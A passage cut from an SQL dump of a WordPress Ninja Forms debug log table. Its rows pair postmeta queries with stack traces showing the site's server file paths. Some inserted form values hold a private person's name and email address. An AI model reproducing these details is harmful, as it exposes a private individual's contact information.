type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(119,60,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 162777',NULL,NULL),(120,60,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(121,61,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162777, \'_field_307\', \'YOUTH AND FAM TEST NUMBER 6. WILL IT EVER END?\')',NULL,NULL),(122,61,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(123,62,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 163130',NULL,NULL),(124,62,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(125,63,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (163130, \'_field_302\', \'Pat\')',NULL,NULL),(126,63,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(127,64,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 163130',NULL,NULL),(128,64,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(129,65,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (163130, \'_field_303\', \'Lafferty\')',NULL,NULL),(130,65,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(131,66,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 163130',NULL,NULL),(132,66,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(133,67,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (163130, \'_field_304\', \'johnpat1999@centurylink.net\')',NULL,NULL),(134,67,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":188,\"function\":\"do_action\"}]',NULL,NULL),(135,68,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 163130',NULL,NULL),(136,68,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\